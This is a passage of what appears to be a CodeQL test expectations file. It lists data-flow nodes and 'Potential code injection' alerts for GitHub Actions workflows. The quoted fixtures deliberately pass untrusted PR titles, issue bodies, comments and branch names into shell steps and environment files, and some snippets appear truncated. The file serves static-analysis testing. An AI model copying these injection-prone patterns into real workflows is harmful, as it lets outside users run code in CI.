| Run Step: changed-files [files] | semmle.label | Run Step: changed-files [files] | +| .github/workflows/test14.yml:24:14:26:52 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "files=${FILES}" >> "$GITHUB_OUTPUT"\n | semmle.label | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "files=${FILES}" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test14.yml:27:21:27:60 | steps.changed-files.outputs.files | semmle.label | steps.changed-files.outputs.files | +| .github/workflows/test14.yml:29:5:38:2 | Job: test3 [CHANGED-FILES] | semmle.label | Job: test3 [CHANGED-FILES] | +| .github/workflows/test14.yml:35:14:36:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | semmle.label | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | +| .github/workflows/test14.yml:37:21:37:44 | env.CHANGED-FILES | semmle.label | env.CHANGED-FILES | +| .github/workflows/test14.yml:39:5:48:45 | Job: test4 [CHANGED-FILES] | semmle.label | Job: test4 [CHANGED-FILES] | +| .github/workflows/test14.yml:45:14:47:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | semmle.label | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | +| .github/workflows/test14.yml:48:21:48:44 | env.CHANGED-FILES | semmle.label | env.CHANGED-FILES | +| .github/workflows/test15.yml:10:9:13:6 | Run Step: title [title] | semmle.label | Run Step: title [title] | +| .github/workflows/test15.yml:11:14:12:103 | echo "title=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_OUTPUT"\n | semmle.label | echo "title=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test15.yml:13:21:13:52 
| steps.title.outputs.title | semmle.label | steps.title.outputs.title | +| .github/workflows/test15.yml:17:9:21:6 | Run Step: title [title] | semmle.label | Run Step: title [title] | +| .github/workflows/test15.yml:18:14:20:53 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "title=$PR_TITLE" >> "$GITHUB_OUTPUT"\n | semmle.label | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "title=$PR_TITLE" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | semmle.label | steps.title.outputs.title | +| .github/workflows/test15.yml:23:5:29:2 | Job: test3 [TITLE] | semmle.label | Job: test3 [TITLE] | +| .github/workflows/test15.yml:26:14:27:100 | echo "TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | semmle.label | echo "TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | +| .github/workflows/test15.yml:28:21:28:36 | env.TITLE | semmle.label | env.TITLE | +| .github/workflows/test15.yml:30:5:36:37 | Job: test4 [TITLE] | semmle.label | Job: test4 [TITLE] | +| .github/workflows/test15.yml:33:14:35:50 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "TITLE=$PR_TITLE" >> "$GITHUB_ENV"\n | semmle.label | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "TITLE=$PR_TITLE" >> "$GITHUB_ENV"\n | +| .github/workflows/test15.yml:36:21:36:36 | env.TITLE | semmle.label | env.TITLE | +| .github/workflows/test16.yml:20:13:24:8 | Job outputs node [ref] | semmle.label | Job outputs node [ref] | +| .github/workflows/test16.yml:21:19:21:48 | steps.ref.outputs.value | semmle.label | steps.ref.outputs.value | +| .github/workflows/test16.yml:26:15:33:12 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test16.yml:38:15:45:12 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test16.yml:45:15:50:12 | Run Step: ref [value] | semmle.label | Run Step: ref 
[value] | +| .github/workflows/test16.yml:47:20:47:64 | echo "value=$(> $GITHUB_OUTPUT | semmle.label | echo "value=$(> $GITHUB_OUTPUT | +| .github/workflows/test16.yml:99:13:102:8 | Job outputs node [commit-message] | semmle.label | Job outputs node [commit-message] | +| .github/workflows/test16.yml:100:30:100:70 | steps.commit-message.outputs.value | semmle.label | steps.commit-message.outputs.value | +| .github/workflows/test16.yml:123:15:128:12 | Run Step: commit-message [value] | semmle.label | Run Step: commit-message [value] | +| .github/workflows/test16.yml:125:20:125:75 | echo "value=$(git log -1 --pretty=%s)" >> $GITHUB_OUTPUT | semmle.label | echo "value=$(git log -1 --pretty=%s)" >> $GITHUB_OUTPUT | +| .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | semmle.label | github.event.workflow_run.head_commit.author.name | +| .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | semmle.label | needs.build-demo.outputs.commit-message | +| .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | semmle.label | needs.setup.outputs.ref | +| .github/workflows/test17.yml:14:13:22:10 | Uses Step: get-pr | semmle.label | Uses Step: get-pr | +| .github/workflows/test17.yml:25:41:25:72 | steps.get-pr.outputs.data | semmle.label | steps.get-pr.outputs.data | +| .github/workflows/test17.yml:30:13:39:10 | Uses Step: get-pr-details | semmle.label | Uses Step: get-pr-details | +| .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | semmle.label | fromJson(steps.get-pr-details.outputs.data).head.ref | +| .github/workflows/test17.yml:49:13:55:10 | Uses Step: issues | semmle.label | Uses Step: issues | +| .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | semmle.label | steps.issues.outputs.data | +| .github/workflows/test17.yml:60:13:68:10 | Uses Step: get-pull-request | semmle.label | Uses Step: get-pull-request | +| 
.github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | semmle.label | fromJson(steps.get-pull-request.outputs.data).title | +| .github/workflows/test18.yml:8:9:16:6 | Uses Step: issues | semmle.label | Uses Step: issues | +| .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | semmle.label | steps.issues.outputs.data | +| .github/workflows/test19.yml:10:9:14:6 | Run Step: head_ref [head_ref] | semmle.label | Run Step: head_ref [head_ref] | +| .github/workflows/test19.yml:11:14:13:56 | HEAD_REF=$(gh pr view "${{ github.event.issue.number }}" --json headRefName -q '.headRefName')\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | semmle.label | HEAD_REF=$(gh pr view "${{ github.event.issue.number }}" --json headRefName -q '.headRefName')\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:14:21:14:57 | steps.head_ref.outputs.head_ref | semmle.label | steps.head_ref.outputs.head_ref | +| .github/workflows/test19.yml:15:9:19:6 | Run Step: title [title] | semmle.label | Run Step: title [title] | +| .github/workflows/test19.yml:16:14:18:50 | TITLE=$(gh pr view $PR_NUMBER --json title --jq .title)\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | semmle.label | TITLE=$(gh pr view $PR_NUMBER --json title --jq .title)\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:19:21:19:51 | steps.title.outputs.title | semmle.label | steps.title.outputs.title | +| .github/workflows/test19.yml:20:9:24:6 | Run Step: body [body] | semmle.label | Run Step: body [body] | +| .github/workflows/test19.yml:21:14:23:48 | BODY=$(gh pr view $PR_NUMBER --json body --jq .body)\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | semmle.label | BODY=$(gh pr view $PR_NUMBER --json body --jq .body)\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:24:21:24:49 | steps.body.outputs.body | semmle.label | steps.body.outputs.body | +| .github/workflows/test19.yml:25:9:29:6 | Run 
Step: comments [comments] | semmle.label | Run Step: comments [comments] | +| .github/workflows/test19.yml:26:14:28:56 | COMMENTS="$(gh pr view --repo ${{ github.repository }} "$PR_NUMBER" --json "body,comments" -q '.body, .comments[].body')"\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | semmle.label | COMMENTS="$(gh pr view --repo ${{ github.repository }} "$PR_NUMBER" --json "body,comments" -q '.body, .comments[].body')"\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:29:21:29:57 | steps.comments.outputs.comments | semmle.label | steps.comments.outputs.comments | +| .github/workflows/test19.yml:30:9:34:6 | Run Step: files [files] | semmle.label | Run Step: files [files] | +| .github/workflows/test19.yml:31:14:33:58 | CHANGED_FILES="$(gh pr view --repo ${{ github.repository }} ${{ needs.check-comment.outputs.pull_number }} --json files --jq '.files.[].path')"\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | semmle.label | CHANGED_FILES="$(gh pr view --repo ${{ github.repository }} ${{ needs.check-comment.outputs.pull_number }} --json files --jq '.files.[].path')"\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:34:21:34:51 | steps.files.outputs.files | semmle.label | steps.files.outputs.files | +| .github/workflows/test19.yml:35:9:39:6 | Run Step: author [author] | semmle.label | Run Step: author [author] | +| .github/workflows/test19.yml:36:14:38:52 | AUTHOR=$(gh pr view ${ORI_PR} -R ${REPO} --json author -q '.author.login') \necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | semmle.label | AUTHOR=$(gh pr view ${ORI_PR} -R ${REPO} --json author -q '.author.login') \necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:39:21:39:53 | steps.author.outputs.author | semmle.label | steps.author.outputs.author | +| .github/workflows/test19.yml:43:9:47:6 | Run Step: head_ref [head_ref] | semmle.label | Run Step: head_ref [head_ref] | +| 
.github/workflows/test19.yml:44:14:46:56 | HEAD_REF=$(gh api -H 'Accept: application/vnd.github+json' /repos/test/test/commits/${{ env.sui_sha }}/pulls --jq '.[].head.ref' \| head -n 1)\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | semmle.label | HEAD_REF=$(gh api -H 'Accept: application/vnd.github+json' /repos/test/test/commits/${{ env.sui_sha }}/pulls --jq '.[].head.ref' \| head -n 1)\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:47:21:47:57 | steps.head_ref.outputs.head_ref | semmle.label | steps.head_ref.outputs.head_ref | +| .github/workflows/test19.yml:48:9:52:6 | Run Step: title [title] | semmle.label | Run Step: title [title] | +| .github/workflows/test19.yml:49:14:51:50 | TITLE=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | semmle.label | TITLE=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:52:21:52:51 | steps.title.outputs.title | semmle.label | steps.title.outputs.title | +| .github/workflows/test19.yml:53:9:57:6 | Run Step: body [body] | semmle.label | Run Step: body [body] | +| .github/workflows/test19.yml:54:14:56:48 | BODY=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | semmle.label | BODY=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:57:21:57:49 | steps.body.outputs.body | semmle.label | steps.body.outputs.body | +| .github/workflows/test19.yml:58:9:62:6 | Run Step: comments [comments] | semmle.label | Run Step: comments [comments] | +| .github/workflows/test19.yml:59:14:61:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | semmle.label | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho 
"comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:62:21:62:57 | steps.comments.outputs.comments | semmle.label | steps.comments.outputs.comments | +| .github/workflows/test19.yml:63:9:67:6 | Run Step: files [files] | semmle.label | Run Step: files [files] | +| .github/workflows/test19.yml:64:14:66:58 | CHANGED_FILES=$(gh api /repos/test/test/pulls/${{PR_NUMBER}}/files --jq '.[].filename')\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | semmle.label | CHANGED_FILES=$(gh api /repos/test/test/pulls/${{PR_NUMBER}}/files --jq '.[].filename')\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:67:21:67:51 | steps.files.outputs.files | semmle.label | steps.files.outputs.files | +| .github/workflows/test19.yml:68:9:72:6 | Run Step: author [author] | semmle.label | Run Step: author [author] | +| .github/workflows/test19.yml:69:14:71:52 | AUTHOR=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".user.login")\necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | semmle.label | AUTHOR=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".user.login")\necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:72:21:72:53 | steps.author.outputs.author | semmle.label | steps.author.outputs.author | +| .github/workflows/test19.yml:76:9:80:6 | Run Step: title [title] | semmle.label | Run Step: title [title] | +| .github/workflows/test19.yml:77:14:79:50 | TITLE=$(gh issue view "$ISSUE_NUMBER" --json title --jq '.title')\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | semmle.label | TITLE=$(gh issue view "$ISSUE_NUMBER" --json title --jq '.title')\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:80:21:80:51 | steps.title.outputs.title | semmle.label | steps.title.outputs.title | +| .github/workflows/test19.yml:81:9:85:6 | Run Step: body [body] | semmle.label | Run Step: body [body] | +| .github/workflows/test19.yml:82:14:84:48 | BODY=$(gh issue view -R ${GITHUB_REPOSITORY} 
${ORIGINAL_ISSUE_NUMBER} --json title,body --jq '.body')\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | semmle.label | BODY=$(gh issue view -R ${GITHUB_REPOSITORY} ${ORIGINAL_ISSUE_NUMBER} --json title,body --jq '.body')\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:85:21:85:49 | steps.body.outputs.body | semmle.label | steps.body.outputs.body | +| .github/workflows/test19.yml:86:9:90:6 | Run Step: comments [comments] | semmle.label | Run Step: comments [comments] | +| .github/workflows/test19.yml:87:14:89:56 | COMMENTS=$(gh issue view "$ISSUE_NUMBER" --json comments --jq '.comments[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | semmle.label | COMMENTS=$(gh issue view "$ISSUE_NUMBER" --json comments --jq '.comments[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:90:21:90:57 | steps.comments.outputs.comments | semmle.label | steps.comments.outputs.comments | +| .github/workflows/test19.yml:94:9:98:6 | Run Step: title [title] | semmle.label | Run Step: title [title] | +| .github/workflows/test19.yml:95:14:97:50 | TITLE=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | semmle.label | TITLE=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | semmle.label | steps.title.outputs.title | +| .github/workflows/test19.yml:99:9:103:6 | Run Step: body [body] | semmle.label | Run Step: body [body] | +| .github/workflows/test19.yml:100:14:102:48 | BODY=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | semmle.label | BODY=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | semmle.label | steps.body.outputs.body | +| 
.github/workflows/test19.yml:104:9:108:6 | Run Step: comments [comments] | semmle.label | Run Step: comments [comments] | +| .github/workflows/test19.yml:105:14:107:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | semmle.label | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | semmle.label | steps.comments.outputs.comments | +| .github/workflows/test21.yml:22:35:22:73 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | +| .github/workflows/test21.yml:23:36:23:74 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | +| .github/workflows/test21.yml:24:50:24:88 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | +| .github/workflows/test24.yml:8:9:17:6 | Uses Step: parse | semmle.label | Uses Step: parse | +| .github/workflows/test24.yml:19:17:19:50 | steps.parse.outputs.payload | semmle.label | steps.parse.outputs.payload | +| .github/workflows/test25.yml:9:9:12:6 | Uses Step: parse | semmle.label | Uses Step: parse | +| .github/workflows/test25.yml:12:20:12:50 | steps.parse.outputs.data | semmle.label | steps.parse.outputs.data | +| .github/workflows/test25.yml:13:20:13:58 | toJSON(steps.parse.outputs.data) | semmle.label | toJSON(steps.parse.outputs.data) | +| .github/workflows/test26.yml:17:9:22:6 | Run Step: read_issue_body [body] | semmle.label | Run Step: read_issue_body [body] | +| .github/workflows/test26.yml:20:11:20:140 | echo "body=$(gh issue view ${{ inputs.issue_number }} --repo ${{ github.repository }} --json body --jq '.body')" >> $GITHUB_OUTPUT | semmle.label | echo "body=$(gh issue view ${{ inputs.issue_number }} --repo ${{ github.repository }} --json body --jq '.body')" >> $GITHUB_OUTPUT | +| 
.github/workflows/test26.yml:22:9:28:6 | Uses Step: parse [data] | semmle.label | Uses Step: parse [data] | +| .github/workflows/test26.yml:26:18:26:58 | steps.read_issue_body.outputs.body | semmle.label | steps.read_issue_body.outputs.body | +| .github/workflows/test26.yml:28:20:28:50 | steps.parse.outputs.data | semmle.label | steps.parse.outputs.data | +| .github/workflows/test26.yml:29:20:29:58 | toJSON(steps.parse.outputs.data) | semmle.label | toJSON(steps.parse.outputs.data) | +| .github/workflows/test27.yml:19:7:21:4 | Job outputs node [chart-version] | semmle.label | Job outputs node [chart-version] | +| .github/workflows/test27.yml:20:23:20:68 | steps.get-version.outputs.chart_version | semmle.label | steps.get-version.outputs.chart_version | +| .github/workflows/test27.yml:35:9:41:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test27.yml:41:9:46:2 | Run Step: get-version [chart_version] | semmle.label | Run Step: get-version [chart_version] | +| .github/workflows/test27.yml:43:14:44:66 | echo "chart_version=$(> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | .github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml:94:30:94:70 | steps.git-commit.outputs.file-list | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml:94:30:94:70 | steps.git-commit.outputs.file-list | ${{ steps.git-commit.outputs.file-list }} | .github/workflows/test22.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-3.yml:10:15:10:52 | github.event.pull_request.title | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | .github/workflows/reusable-workflow-caller-3.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | ${{ env.log }} | .github/workflows/reusable-workflow-caller-3.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:45:24:45:61 | github.event.changes.title.from | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | ${{ env.prev_log }} | .github/workflows/reusable-workflow-caller-3.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | .github/workflows/image_link_generator.yml:18:18:18:49 | github.event.comment.body | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | ${{ steps.trim-url.outputs.trimmed_url }} | .github/workflows/image_link_generator.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | ${{ github.event.issue.title }} | .github/workflows/issues.yaml:1:5:1:10 | issues | issues | +| .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/issues.yaml:1:5:1:10 | issues | issues | +| .github/workflows/issues.yaml:15:19:15:39 | env.global_env | .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | ${{ env.global_env }} | .github/workflows/issues.yaml:1:5:1:10 | issues | issues | +| .github/workflows/issues.yaml:17:19:17:36 | env.job_env | .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | ${{ env.job_env }} | .github/workflows/issues.yaml:1:5:1:10 | issues | issues | +| .github/workflows/issues.yaml:18:19:18:37 | env.step_env | .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/issues.yaml:18:19:18:37 | env.step_env | ${{ env.step_env }} | .github/workflows/issues.yaml:1:5:1:10 | issues | issues | +| .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/json_wrap.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | ${{ toJSON(github.event.issue.title)}} | .github/workflows/json_wrap.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/level0.yml:3:3:3:8 | issues | issues | +| .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/level0.yml:5:3:5:15 | issue_comment | issue_comment | +| .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/level0.yml:5:3:5:15 | issue_comment | issue_comment | +| .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/level1.yml:3:3:3:14 | workflow_run | workflow_run | +| .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | +| .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | +| .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | +| .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | +| .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | +| .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user ($@). | 